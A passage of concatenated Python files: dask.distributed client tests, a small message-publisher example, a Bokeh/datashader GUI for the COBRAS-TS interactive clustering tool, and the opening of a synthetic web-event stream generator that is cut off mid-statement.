assert link == c.dashboard_link
text = c._repr_html_()
assert link in text
@pytest.mark.asyncio
async def test_dashboard_link_inproc(cleanup):
async with Client(processes=False, asynchronous=True) as c:
with dask.config.set({"distributed.dashboard.link": "{host}"}):
assert "/" not in c.dashboard_link
@gen_test()
async def test_client_timeout_2():
with dask.config.set({"distributed.comm.timeouts.connect": "10ms"}):
start = time()
c = Client("127.0.0.1:3755", asynchronous=True)
with pytest.raises((TimeoutError, IOError)):
await c
stop = time()
assert c.status == "closed"
await c.close()
assert stop - start < 1
@gen_test()
async def test_client_active_bad_port():
import tornado.httpserver
import tornado.web
application = tornado.web.Application([(r"/", tornado.web.RequestHandler)])
http_server = tornado.httpserver.HTTPServer(application)
http_server.listen(8080)
with dask.config.set({"distributed.comm.timeouts.connect": "10ms"}):
c = Client("127.0.0.1:8080", asynchronous=True)
with pytest.raises((TimeoutError, IOError)):
await c
await c._close(fast=True)
http_server.stop()
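# With serializers restricted to "dask" and "msgpack", plain data and ordinary task
# submission still work (tasks travel via pickle regardless), but scattering or
# gathering arbitrary Python objects should raise TypeError.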
@pytest.mark.parametrize("direct", [True, False])
def test_turn_off_pickle(direct):
@gen_cluster()
async def test(s, a, b):
np = pytest.importorskip("numpy")
async with Client(
s.address, asynchronous=True, serializers=["dask", "msgpack"]
) as c:
assert (await c.submit(inc, 1)) == 2
await c.submit(np.ones, 5)
await c.scatter(1)
# Can't send complex data
with pytest.raises(TypeError):
future = await c.scatter(inc)
# can send complex tasks (this uses pickle regardless)
future = c.submit(lambda x: x, inc)
await wait(future)
# but can't receive complex results
with pytest.raises(TypeError):
await c.gather(future, direct=direct)
# Run works
result = await c.run(lambda: 1)
assert list(result.values()) == [1, 1]
result = await c.run_on_scheduler(lambda: 1)
assert result == 1
# But not with complex return values
with pytest.raises(TypeError):
await c.run(lambda: inc)
with pytest.raises(TypeError):
await c.run_on_scheduler(lambda: inc)
test()
@gen_cluster()
async def test_de_serialization(s, a, b):
np = pytest.importorskip("numpy")
c = await Client(
s.address,
asynchronous=True,
serializers=["msgpack", "pickle"],
deserializers=["msgpack"],
)
try:
# Can send complex data
future = await c.scatter(np.ones(5))
# But can not retrieve it
with pytest.raises(TypeError):
result = await future
finally:
await c.close()
@gen_cluster()
async def test_de_serialization_none(s, a, b):
np = pytest.importorskip("numpy")
c = await Client(s.address, asynchronous=True, deserializers=["msgpack"])
try:
# Can send complex data
future = await c.scatter(np.ones(5))
# But can not retrieve it
with pytest.raises(TypeError):
result = await future
finally:
await c.close()
@gen_cluster()
async def test_client_repr_closed(s, a, b):
c = await Client(s.address, asynchronous=True)
await c.close()
c._repr_html_()
def test_client_repr_closed_sync(loop):
with Client(loop=loop, processes=False, dashboard_address=None) as c:
c.close()
c._repr_html_()
@pytest.mark.xfail(reason="https://github.com/dask/dask/pull/6807")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)])
async def test_nested_prioritization(c, s, w):
x = delayed(inc)(1, dask_key_name=("a", 2))
y = delayed(inc)(2, dask_key_name=("a", 10))
o = dask.order.order(merge(x.__dask_graph__(), y.__dask_graph__()))
fx, fy = c.compute([x, y])
await wait([fx, fy])
assert (o[x.key] < o[y.key]) == (
s.tasks[stringify(fx.key)].priority < s.tasks[stringify(fy.key)].priority
)
@gen_cluster(client=True)
async def test_scatter_error_cancel(c, s, a, b):
# https://github.com/dask/distributed/issues/2038
def bad_fn(x):
raise Exception("lol")
x = await c.scatter(1)
y = c.submit(bad_fn, x)
del x
await wait(y)
assert y.status == "error"
await asyncio.sleep(0.1)
assert y.status == "error" # not cancelled
def test_no_threads_lingering():
active = dict(threading._active)
assert threading.active_count() < 40, list(active.values())
@gen_cluster()
async def test_direct_async(s, a, b):
c = await Client(s.address, asynchronous=True, direct_to_workers=True)
assert c.direct_to_workers
await c.close()
c = await Client(s.address, asynchronous=True, direct_to_workers=False)
assert not c.direct_to_workers
await c.close()
def test_direct_sync(c):
assert not c.direct_to_workers
def f():
return get_client().direct_to_workers
assert c.submit(f).result()
@gen_cluster()
async def test_mixing_clients(s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
future = c1.submit(inc, 1)
with pytest.raises(ValueError):
c2.submit(inc, future)
assert not c2.futures # Don't create Futures on second Client
await c1.close()
await c2.close()
@gen_cluster(client=True)
async def test_tuple_keys(c, s, a, b):
x = dask.delayed(inc)(1, dask_key_name=("x", 1))
y = dask.delayed(inc)(x, dask_key_name=("y", 1))
future = c.compute(y)
assert (await future) == 3
@gen_cluster(client=True)
async def test_multiple_scatter(c, s, a, b):
futures = await asyncio.gather(*[c.scatter(1, direct=True) for _ in range(5)])
x = await futures[0]
x = await futures[0]
@gen_cluster(client=True)
async def test_map_large_kwargs_in_graph(c, s, a, b):
np = pytest.importorskip("numpy")
x = np.random.random(100000)
futures = c.map(lambda a, b: a + b, range(100), b=x)
while not s.tasks:
await asyncio.sleep(0.01)
assert len(s.tasks) == 101
assert any(k.startswith("ndarray") for k in s.tasks)
@gen_cluster(client=True)
async def test_retry(c, s, a, b):
def f():
assert dask.config.get("foo")
with dask.config.set(foo=False):
future = c.submit(f)
with pytest.raises(AssertionError):
await future
with dask.config.set(foo=True):
await future.retry()
await future
@gen_cluster(client=True)
async def test_retry_dependencies(c, s, a, b):
def f():
return dask.config.get("foo")
x = c.submit(f)
y = c.submit(inc, x)
with pytest.raises(KeyError):
await y
with dask.config.set(foo=100):
await y.retry()
result = await y
assert result == 101
await y.retry()
await x.retry()
result = await y
assert result == 101
@gen_cluster(client=True)
async def test_released_dependencies(c, s, a, b):
def f(x):
return dask.config.get("foo") + 1
x = c.submit(inc, 1, key="x")
y = c.submit(f, x, key="y")
del x
with pytest.raises(KeyError):
await y
with dask.config.set(foo=100):
await y.retry()
result = await y
assert result == 101
@gen_cluster(client=True, clean_kwargs={"threads": False})
async def test_profile_bokeh(c, s, a, b):
pytest.importorskip("bokeh.plotting")
from bokeh.model import Model
await c.gather(c.map(slowinc, range(10), delay=0.2))
state, figure = await c.profile(plot=True)
assert isinstance(figure, Model)
with tmpfile("html") as fn:
try:
await c.profile(filename=fn)
except PermissionError:
if WINDOWS:
pytest.xfail()
assert os.path.exists(fn)
@gen_cluster(client=True)
async def test_get_mix_futures_and_SubgraphCallable(c, s, a, b):
future = c.submit(add, 1, 2)
subgraph = SubgraphCallable(
{"_2": (add, "_0", "_1"), "_3": (add, future, "_2")}, "_3", ("_0", "_1")
)
dsk = {"a": 1, "b": 2, "c": (subgraph, "a", "b"), "d": (subgraph, "c", "b")}
future2 = c.get(dsk, "d", sync=False)
result = await future2
assert result == 11
# Nested subgraphs
subgraph2 = SubgraphCallable(
{
"_2": (subgraph, "_0", "_1"),
"_3": (subgraph, "_2", "_1"),
"_4": (add, "_3", future2),
},
"_4",
("_0", "_1"),
)
dsk2 = {"e": 1, "f": 2, "g": (subgraph2, "e", "f")}
result = await c.get(dsk2, "g", sync=False)
assert result == 22
@gen_cluster(client=True)
async def test_get_mix_futures_and_SubgraphCallable_dask_dataframe(c, s, a, b):
dd = pytest.importorskip("dask.dataframe")
import pandas as pd
df = pd.DataFrame({"x": range(1, 11)})
ddf = dd.from_pandas(df, npartitions=2).persist()
ddf = ddf.map_partitions(lambda x: x)
ddf["x"] = ddf["x"].astype("f8")
ddf = ddf.map_partitions(lambda x: x)
ddf["x"] = ddf["x"].astype("f8")
result = await c.compute(ddf)
assert result.equals(df.astype("f8"))
def test_direct_to_workers(s, loop):
with Client(s["address"], loop=loop, direct_to_workers=True) as client:
future = client.scatter(1)
future.result()
resp = client.run_on_scheduler(lambda dask_scheduler: dask_scheduler.events)
assert "gather" not in str(resp)
@gen_cluster(client=True)
async def test_instances(c, s, a, b):
assert list(Client._instances) == [c]
assert list(Scheduler._instances) == [s]
assert set(Worker._instances) == {a, b}
@gen_cluster(client=True)
async def test_wait_for_workers(c, s, a, b):
future = asyncio.ensure_future(c.wait_for_workers(n_workers=3))
await asyncio.sleep(0.22) # 2 chances
assert not future.done()
w = await Worker(s.address)
start = time()
await future
assert time() < start + 1
await w.close()
with pytest.raises(TimeoutError) as info:
await c.wait_for_workers(n_workers=10, timeout="1 ms")
assert "2/10" in str(info.value).replace(" ", "")
assert "1 ms" in str(info.value)
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
@pytest.mark.asyncio
@pytest.mark.parametrize("Worker", [Worker, Nanny])
async def test_file_descriptors_dont_leak(Worker):
pytest.importorskip("pandas")
df = dask.datasets.timeseries(freq="10s", dtypes={"x": int, "y": float})
proc = psutil.Process()
start = proc.num_fds()
async with Scheduler(port=0, dashboard_address=":0") as s:
async with Worker(s.address, nthreads=2) as a, Worker(
s.address, nthreads=2
) as b:
async with Client(s.address, asynchronous=True) as c:
await df.sum().persist()
begin = time()
while proc.num_fds() > begin:
await asyncio.sleep(0.01)
assert time() < begin + 5, (start, proc.num_fds())
@pytest.mark.asyncio
async def test_dashboard_link_cluster(cleanup):
class MyCluster(LocalCluster):
@property
def dashboard_link(self):
return "http://foo.com"
async with MyCluster(processes=False, asynchronous=True) as cluster:
async with Client(cluster, asynchronous=True) as client:
assert "http://foo.com" in client._repr_html_()
@pytest.mark.asyncio
async def test_shutdown(cleanup):
async with Scheduler(port=0) as s:
async with Worker(s.address) as w:
async with Client(s.address, asynchronous=True) as c:
await c.shutdown()
assert s.status == Status.closed
assert w.status == Status.closed
@pytest.mark.asyncio
async def test_shutdown_localcluster(cleanup):
async with LocalCluster(n_workers=1, asynchronous=True, processes=False) as lc:
async with Client(lc, asynchronous=True) as c:
await c.shutdown()
assert lc.scheduler.status == Status.closed
@pytest.mark.asyncio
async def test_config_inherited_by_subprocess(cleanup):
def f(x):
return dask.config.get("foo") + 1
with dask.config.set(foo=100):
async with LocalCluster(n_workers=1, asynchronous=True, processes=True) as lc:
async with Client(lc, asynchronous=True) as c:
result = await c.submit(f, 1)
assert result == 101
@gen_cluster(client=True)
async def test_futures_of_sorted(c, s, a, b):
pytest.importorskip("dask.dataframe")
df = await dask.datasets.timeseries(dtypes={"x": int}).persist()
futures = futures_of(df)
for k, f in zip(df.__dask_keys__(), futures):
assert str(k) in str(f)
@gen_cluster(client=True, worker_kwargs={"profile_cycle_interval": "10ms"})
async def test_profile_server(c, s, a, b):
for i in range(5):
try:
x = c.map(slowinc, range(10), delay=0.01, workers=a.address, pure=False)
await wait(x)
await asyncio.gather(
c.run(slowinc, 1, delay=0.5), c.run_on_scheduler(slowdec, 1, delay=0.5)
)
p = await c.profile(server=True) # All worker servers
assert "slowinc" in str(p)
p = await c.profile(scheduler=True) # Scheduler
assert "slowdec" in str(p)
except AssertionError:
if i == 4:
raise
else:
pass
else:
break
@gen_cluster(client=True)
async def test_await_future(c, s, a, b):
future = c.submit(inc, 1)
async def f(): # flake8: noqa
result = await future
assert result == 2
await f()
future = c.submit(div, 1, 0)
async def f():
with pytest.raises(ZeroDivisionError):
await future
await f()
@gen_cluster(client=True)
async def test_as_completed_async_for(c, s, a, b):
futures = c.map(inc, range(10))
ac = as_completed(futures)
results = []
async def f():
async for future in ac:
result = await future
results.append(result)
await f()
assert set(results) == set(range(1, 11))
@gen_cluster(client=True)
async def test_as_completed_async_for_results(c, s, a, b):
futures = c.map(inc, range(10))
ac = as_completed(futures, with_results=True)
results = []
async def f():
async for future, result in ac:
results.append(result)
await f()
assert set(results) == set(range(1, 11))
assert not s.counters["op"].components[0]["gather"]
@gen_cluster(client=True)
async def test_as_completed_async_for_cancel(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(sleep, 0.3)
ac = as_completed([x, y])
async def _():
await asyncio.sleep(0.1)
await y.cancel(asynchronous=True)
c.loop.add_callback(_)
L = []
async def f():
async for future in ac:
L.append(future)
await f()
assert L == [x, y]
def test_async_with(loop):
result = None
client = None
cluster = None
async def f():
async with Client(processes=False, asynchronous=True) as c:
nonlocal result, client, cluster
result = await c.submit(lambda x: x + 1, 10)
client = c
cluster = c.cluster
loop.run_sync(f)
assert result == 11
assert client.status == "closed"
assert cluster.status == Status.closed
def test_client_sync_with_async_def(loop):
async def ff():
await asyncio.sleep(0.01)
return 1
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
assert sync(loop, ff) == 1
assert c.sync(ff) == 1
@pytest.mark.skip(reason="known intermittent failure")
@gen_cluster(client=True)
async def test_dont_hold_on_to_large_messages(c, s, a, b):
np = pytest.importorskip("numpy")
da = pytest.importorskip("dask.array")
x = np.random.random(1000000)
xr = weakref.ref(x)
d = da.from_array(x, chunks=(100000,))
d = d.persist()
del x
start = time()
while xr() is not None:
if time() > start + 5:
# Help diagnosing
from types import FrameType
x = xr()
if x is not None:
del x
rc = sys.getrefcount(xr())
refs = gc.get_referrers(xr())
print("refs to x:", rc, refs, gc.isenabled())
frames = [r for r in refs if isinstance(r, FrameType)]
for i, f in enumerate(frames):
print(
"frames #%d:" % i,
f.f_code.co_name,
f.f_code.co_filename,
sorted(f.f_locals),
)
pytest.fail("array should have been destroyed")
await asyncio.sleep(0.200)
@gen_cluster(client=True)
async def test_run_scheduler_async_def(c, s, a, b):
async def f(dask_scheduler):
await asyncio.sleep(0.01)
dask_scheduler.foo = "bar"
await c.run_on_scheduler(f)
assert s.foo == "bar"
async def f(dask_worker):
await asyncio.sleep(0.01)
dask_worker.foo = "bar"
await c.run(f)
assert a.foo == "bar"
assert b.foo == "bar"
@gen_cluster(client=True)
async def test_run_scheduler_async_def_wait(c, s, a, b):
async def f(dask_scheduler):
await asyncio.sleep(0.01)
dask_scheduler.foo = "bar"
await c.run_on_scheduler(f, wait=False)
while not hasattr(s, "foo"):
await asyncio.sleep(0.01)
assert s.foo == "bar"
async def f(dask_worker):
await asyncio.sleep(0.01)
dask_worker.foo = "bar"
await c.run(f, wait=False)
while not hasattr(a, "foo") or not hasattr(b, "foo"):
await asyncio.sleep(0.01)
assert a.foo == "bar"
assert b.foo == "bar"
@gen_cluster(client=True, nthreads=[("127.0.0.1", 2)] * 2)
async def test_performance_report(c, s, a, b):
pytest.importorskip("bokeh")
da = pytest.importorskip("dask.array")
async def f():
"""
We wrap this in a function so that the assertions aren't in the
performance report itself.
Also, we want this comment to appear
"""
x = da.random.random((1000, 1000), chunks=(100, 100))
with tmpfile(extension="html") as fn:
async with performance_report(filename=fn):
await c.compute((x + x.T).sum())
with open(fn) as f:
data = f.read()
return data
data = await f()
assert "Also, we want this comment to appear" in data
assert "bokeh" in data
assert "random" in data
assert "Dask Performance Report" in data
assert "x = da.random" in data
assert "Threads: 4" in data
assert dask.__version__ in data
@pytest.mark.asyncio
async def test_client_gather_semaphore_loop(cleanup):
async with Scheduler(port=0) as s:
async with Client(s.address, asynchronous=True) as c:
assert c._gather_semaphore._loop is c.loop.asyncio_loop
@gen_cluster(client=True)
async def test_as_completed_condition_loop(c, s, a, b):
seq = c.map(inc, range(5))
ac = as_completed(seq)
assert ac.condition._loop == c.loop.asyncio_loop
def test_client_connectionpool_semaphore_loop(s, a, b):
with Client(s["address"]) as c:
assert c.rpc.semaphore._loop is c.loop.asyncio_loop
@pytest.mark.slow
@pytest.mark.asyncio
async def test_mixed_compression(cleanup):
pytest.importorskip("lz4")
da = pytest.importorskip("dask.array")
async with Scheduler(port=0, dashboard_address=":0") as s:
async with Nanny(
s.address, nthreads=1, config={"distributed.comm.compression": None}
) as a:
async with Nanny(
s.address, nthreads=1, config={"distributed.comm.compression": "lz4"}
) as b:
async with Client(s.address, asynchronous=True) as c:
await c.get_versions()
x = da.ones((10000, 10000))
y = x + x.T
await c.compute(y.sum())
@gen_cluster(client=True)
async def test_futures_in_subgraphs(c, s, a, b):
"""Regression test of <https://github.com/dask/distributed/issues/4145>"""
dd = pytest.importorskip("dask.dataframe")
import pandas as pd
ddf = dd.from_pandas(
pd.DataFrame(
dict(
uid=range(50),
enter_time=pd.date_range(
start="2020-01-01", end="2020-09-01", periods=50, tz="UTC"
),
)
),
npartitions=5,
)
ddf = ddf[ddf.uid.isin(range(29))].persist()
ddf["local_time"] = ddf.enter_time.dt.tz_convert("US/Central")
ddf["day"] = ddf.enter_time.dt.day_name()
ddf = await c.submit(dd.categorical.categorize, ddf, columns=["day"], index=False)
@gen_cluster(client=True)
async def test_get_task_metadata(c, s, a, b):
# Populate task metadata
await c.register_worker_plugin(TaskStateMetadataPlugin())
async with get_task_metadata() as tasks:
f = c.submit(slowinc, 1)
await f
metadata = tasks.metadata
assert f.key in metadata
assert metadata[f.key] == s.tasks.get(f.key).metadata
state = tasks.state
assert f.key in state
assert state[f.key] == "memory"
assert not any(isinstance(p, CollectTaskMetaDataPlugin) for p in s.plugins)
@gen_cluster(client=True)
async def test_get_task_metadata_multiple(c, s, a, b):
# Populate task metadata
await c.register_worker_plugin(TaskStateMetadataPlugin())
# Ensure that get_task_metadata only collects metadata for
# tasks which are submitted and completed within its context
async with get_task_metadata() as tasks1:
f1 = c.submit(slowinc, 1)
await f1
async with get_task_metadata() as tasks2:
f2 = c.submit(slowinc, 2)
await f2
metadata1 = tasks1.metadata
metadata2 = tasks2.metadata
assert len(metadata1) == 2
assert sorted(metadata1.keys()) == sorted([f1.key, f2.key])
assert metadata1[f1.key] == s.tasks.get(f1.key).metadata
assert metadata1[f2.key] == s.tasks.get(f2.key).metadata
assert len(metadata2) == 1
assert list(metadata2.keys()) == [f2.key]
assert metadata2[f2.key] == s.tasks.get(f2.key).metadata
@gen_cluster(client=True)
async def test_log_event(c, s, a, b):
# Log an event from inside a task
def foo():
get_worker().log_event("topic1", {"foo": "bar"})
assert not await c.get_events("topic1")
await c.submit(foo)
events = await c.get_events("topic1")
assert len(events) == 1
assert events[0][1] == {"foo": "bar"}
# Log an event while on the scheduler
def log_scheduler(dask_scheduler):
dask_scheduler.log_event("topic2", {"woo": "hoo"})
await c.run_on_scheduler(log_scheduler)
events = await c.get_events("topic2")
assert len(events) == 1
assert events[0][1] == {"woo": "hoo"}
# Log an event from the client process
await c.log_event("topic2", ("alice", "bob"))
events = await c.get_events("topic2")
assert len(events) == 2
assert events[1][1] == ("alice", "bob")
@gen_cluster(client=True)
async def test_annotations_task_state(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(qux="bar", priority=100):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all(
{"qux": "bar", "priority": 100} == ts.annotations for ts in s.tasks.values()
)
@pytest.mark.parametrize("fn", ["compute", "persist"])
def test_annotations_compute_time(fn):
da = pytest.importorskip("dask.array")
@gen_cluster(client=True)
async def test(c, s, a, b):
x = da.ones(10, chunks=(5,))
with dask.annotate(foo="bar"):
# Turn off optimization to avoid rewriting layers and picking up annotations
# that way. Instead, we want `compute`/`persist` to be able to pick them up.
x = await getattr(c, fn)(x, optimize_graph=False)
assert all({"foo": "bar"} == ts.annotations for ts in s.tasks.values())
test()
@pytest.mark.xfail(reason="https://github.com/dask/dask/issues/7036")
@gen_cluster(client=True)
async def test_annotations_survive_optimization(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(foo="bar"):
x = da.ones(10, chunks=(5,))
ann = x.__dask_graph__().layers[x.name].annotations
assert ann is not None
assert ann.get("foo", None) == "bar"
(xx,) = dask.optimize(x)
ann = xx.__dask_graph__().layers[x.name].annotations
assert ann is not None
assert ann.get("foo", None) == "bar"
@gen_cluster(client=True)
async def test_annotations_priorities(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(priority=15):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all("15" in str(ts.priority) for ts in s.tasks.values())
assert all(ts.priority[0] == -15 for ts in s.tasks.values())
assert all({"priority": 15} == ts.annotations for ts in s.tasks.values())
@gen_cluster(client=True)
async def test_annotations_workers(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(workers=[a.address]):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all({"workers": (a.address,)} == ts.annotations for ts in s.tasks.values())
assert all({a.address} == ts.worker_restrictions for ts in s.tasks.values())
assert a.data
assert not b.data
@gen_cluster(client=True)
async def test_annotations_retries(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(retries=2):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all(ts.retries == 2 for ts in s.tasks.values())
assert all(ts.annotations == {"retries": 2} for ts in s.tasks.values())
@gen_cluster(client=True)
async def test_annotations_blockwise_unpack(c, s, a, b):
da = pytest.importorskip("dask.array")
np = pytest.importorskip("numpy")
from dask.array.utils import assert_eq
# A flaky doubling function -- need extra args because it is called before
# application to establish dtype/meta.
scale = varying([ZeroDivisionError("one"), ZeroDivisionError("two"), 2, 2])
def flaky_double(x):
return scale() * x
# A reliable double function.
def reliable_double(x):
return 2 * x
x = da.ones(10, chunks=(5,))
# The later annotations should not override the earlier annotations
with dask.annotate(retries=2):
y = x.map_blocks(flaky_double, meta=np.array((), dtype=float))
with dask.annotate(retries=0):
z = y.map_blocks(reliable_double, meta=np.array((), dtype=float))
with dask.config.set(optimization__fuse__active=False):
z = await c.compute(z)
assert_eq(z, np.ones(10) * 4.0)
@gen_cluster(
client=True,
nthreads=[
("127.0.0.1", 1),
("127.0.0.1", 1, {"resources": {"GPU": 1}}),
],
)
async def test_annotations_resources(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(resources={"GPU": 1}):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all([{"GPU": 1} == ts.resource_restrictions for ts in s.tasks.values()])
assert all([{"resources": {"GPU": 1}} == ts.annotations for ts in s.tasks.values()])
@gen_cluster(
client=True,
nthreads=[
("127.0.0.1", 1),
("127.0.0.1", 1, {"resources": {"GPU": 1}}),
],
)
async def test_annotations_resources_culled(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones((2, 2, 2), chunks=1)
with dask.annotate(resources={"GPU": 1}):
y = x.map_blocks(lambda x0: x0, meta=x._meta)
z = y[0, 0, 0]
(z,) = c.compute([z], optimize_graph=False)
await z
# it worked!
@gen_cluster(client=True)
async def test_annotations_loose_restrictions(c, s, a, b):
da = pytest.importorskip("dask.array")
# Eventually fails if allow_other_workers=False
with dask.annotate(workers=["fake"], allow_other_workers=True):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all(not ts.worker_restrictions for ts in s.tasks.values())
assert all({"fake"} == ts.host_restrictions for ts in s.tasks.values())
assert all(
[
{"workers": ("fake",), "allow_other_workers": True} == ts.annotations
for ts in s.tasks.values()
]
)
@gen_cluster(client=True)
async def test_workers_collection_restriction(c, s, a, b):
da = pytest.importorskip("dask.array")
future = c.compute(da.arange(10), workers=a.address)
await future
assert a.data and not b.data
|
example_publisher.py
|
import proccom
from threading import Thread
import time
def break_cmd():
stop = False
while not stop:
a = input()
if a == 'q':
stop = True
def main():
break_thread = Thread(target=break_cmd, daemon=False)
break_thread.start()
publisher = proccom.Publisher('test_topic', 'test_publisher', proccom.msgs.format_test)
publisher.connect()
stop = False
while not stop:
time.sleep(1)
publisher.publish(1, 2, 3)
if not break_thread.is_alive():
stop = True
publisher.stop()
if __name__ == '__main__':
main()
|
main.py
|
import os, sys
from threading import Thread, Timer
from bokeh.layouts import column, row
from bokeh.models import Button
from bokeh.plotting import curdoc, figure
from bokeh.models.widgets import Div
from functools import partial
try:
import datashader
except ImportError:
datashader = None
print("\n\nThe datashader package needs to be installed from source to use the GUI:\n"
"$ pip install git+ssh://git@github.com/bokeh/datashader.git@0.6.5#egg=datashader-0.6.5\n\n")
if datashader is None:
sys.exit(1)
try:
from cobras_ts.querier.visualquerier import VisualQuerier
from cobras_ts.cobras_kshape import COBRAS_kShape
from cobras_ts.cli import create_parser, prepare_data, prepare_clusterer
except ImportError:
sys.path.append(os.path.join(os.path.abspath(os.path.dirname(__file__)), os.pardir, os.pardir))
from cobras_ts.querier.visualquerier import VisualQuerier
from cobras_ts.cobras_kshape import COBRAS_kShape
from cobras_ts.cli import create_parser, prepare_data, prepare_clusterer
import random
import numpy as np
import pandas as pd
import sys
def communicate_query_result(query_result):
global querier
querier.query_result = query_result
querier.query_answered = True
curdoc().title = "COBRAS-TS"
loading = Div(text="""<h3>Loading...<h3>""", width=100, height=100)
def mustlink_callback():
global query_answered
global querier
global layout
global button_ml
global button_cl
button_ml.disabled = True
button_cl.disabled = True
layout.children[1].children[1].children[1] = loading
t = Timer(0.1, partial(communicate_query_result, query_result=True))
t.start()
#querier.query_answered = True
#querier.query_result = True
def cannotlink_callback():
global query_answered
global querier
global layout
layout.children[1].children[1].children[1] = loading
button_ml.disabled = True
button_cl.disabled = True
t = Timer(0.1, partial(communicate_query_result, query_result=False))
t.start()
#querier.query_answered = True
#querier.query_result = False
button_ml = Button(label="Yes (must-link)", button_type="success")
button_ml.on_click(mustlink_callback)
button_cl = Button(label="No (cannot-link)", button_type="warning")
button_cl.on_click(cannotlink_callback)
random.seed(123)
np.random.seed(123)
query_answered = False
sys.argv = sys.argv[1].split(' ')
parser = create_parser()
args = parser.parse_args(None)
series, labels = prepare_data(**vars(args))
doc = curdoc()
# reformat the data into an appropriate DataFrame
dfs = []
split = pd.DataFrame({'x': [np.nan]})
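# Each series is followed by this single all-NaN row; datashader's line aggregation
# treats NaN as a break, so the concatenated frame renders the series as separate
# lines instead of one connected trace.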
for i in range(len(series)):
x = list(range(len(series[0])))
y = series[i]
df3 = pd.DataFrame({'x': x, 'y': y})
dfs.append(df3)
dfs.append(split)
df2 = pd.concat(dfs, ignore_index=True)
x_range = 0, series.shape[1]
y_range = series[1:].min(), series[1:].max()
all_data_plot = figure(plot_width=400, plot_height=180, x_range=x_range, y_range=y_range, title="Full dataset",toolbar_location='above')
p = figure(plot_width=400, plot_height=180, x_range=x_range, y_range=y_range, title="Full dataset",toolbar_location='above')
canvas = datashader.Canvas(x_range=x_range, y_range=y_range,
plot_height=180, plot_width=400)
agg = canvas.line(df2, 'x', 'y', datashader.count())
img = datashader.transfer_functions.shade(agg, how='eq_hist')
all_data_plot.image_rgba(image=[img.data], x=x_range[0], y=y_range[0], dw=x_range[1] - x_range[0], dh=y_range[1] - y_range[0])
p.image_rgba(image=[img.data], x=x_range[0], y=y_range[0], dw=x_range[1] - x_range[0], dh=y_range[1] - y_range[0])
initial_temp_clustering = row(p)
topdiv = Div(text="<h1> COBRAS<sup>TS</sup> <br> iteration: 1 <br> # queries answered: 0 </h1>", css_classes=['top_title_div'],
width=500, height=100)
div = Div(text="<h2> The full dataset </h2>", css_classes=['title_div'],
width=200, height=100)
div2 = Div(text="<h2> Should these two instances be in the same cluster? </h2>", css_classes=['title_div'],
width=500, height=100)
div3 = Div(text="<h2> The (intermediate) clustering </h2>", css_classes=['title_div'],
width=400, height=100)
div4 = Div(text="", css_classes=['title_div'],width=400, height=100)
ts1 = figure(x_axis_type="datetime", plot_width=250, plot_height=120, toolbar_location=None) # placeholders
ts2 = figure(x_axis_type="datetime", plot_width=250, plot_height=120, toolbar_location=None)
layout = column(row(topdiv), row(column(div, all_data_plot), column(div2, row(ts1, ts2), column(button_ml, button_cl))), div3, initial_temp_clustering, div4)
curdoc().add_root(layout)
querier = VisualQuerier(series, curdoc(), layout)
#clusterer = COBRAS_kShape(series, querier, 100000)
clusterer_args = vars(args)
clusterer = prepare_clusterer(data=series, querier=querier, **clusterer_args)
def blocking_task():
clusterer.cluster()
thread = Thread(target=blocking_task)
thread.start()
|
event_stream_generator.py
|
__author__ = 'Bohdan Mushkevych'
import datetime
import random
import time
import math
from threading import Thread
from amqp import AMQPError
from db.model.raw_data import RawData
from synergy.mq.flopsy import Publisher
from synergy.system.performance_tracker import SimpleTracker
from synergy.system.synergy_process import SynergyProcess
SLEEP_TIME = 0.05
TICK_INTERVAL = 10
class EventStreamGenerator(SynergyProcess):
""" illustration suite worker:
- emulates user activity on the web site """
def __init__(self, process_name):
super(EventStreamGenerator, self).__init__(process_name)
self.main_thread = None
self.publisher = Publisher(process_name)
self.performance_tracker = SimpleTracker(self.logger)
self.previous_tick = time.time()
self.thread_is_running = True
utc_date = datetime.datetime.utcnow()
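# Pack the current UTC timestamp into a numeric group prefix of the form
# YYYYMMDDhhmmss00: the two trailing digits are filled per session in _generate_key,
# and the prefix is bumped by 100 every TICK_INTERVAL seconds in _run_stream_generation.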
self.number_of_groups = utc_date.year * math.pow(10, 12) + \
utc_date.month * math.pow(10, 10) + \
utc_date.day * math.pow(10, 8) + \
utc_date.hour * math.pow(10, 6) + \
utc_date.minute * math.pow(10, 4) + \
utc_date.second * math.pow(10, 2)
self.logger.info(f'Started {self.process_name}')
def __del__(self):
self.publisher.close()
self.performance_tracker.cancel()
super(EventStreamGenerator, self).__del__()
self.logger.info('Exiting main thread. All auxiliary threads stopped.')
def _generate_key(self):
_id = random.randint(0, 100000)
domain_name = 'domain{0}__com'.format(_id)
session_no = self.number_of_groups + random.randint(0, 99)
session_id = 'session_{0}'.format(session_no)
return domain_name, time.time(), session_id
def _run_stream_generation(self):
self.logger.info('Stream Generator: ON. Expected rate: {0}/s, {1}/m, {2}/h, {3}/d'
.format(1 / SLEEP_TIME, 1 / SLEEP_TIME * 60, 1 / SLEEP_TIME * 3600, 1 / SLEEP_TIME * 86400))
self.performance_tracker.start()
random.seed('RANDOM_SEED_OBJECT')
document = RawData()
while self.thread_is_running:
if time.time() - self.previous_tick > TICK_INTERVAL:
# increment group number every TICK_INTERVAL seconds
self.number_of_groups += 100
self.previous_tick = time.time()
try:
document.key = self._generate_key()
document.ip = '{0}.{1}.{2}.{3}'.format(random.randint(0, 255),
random.randint(0, 255),
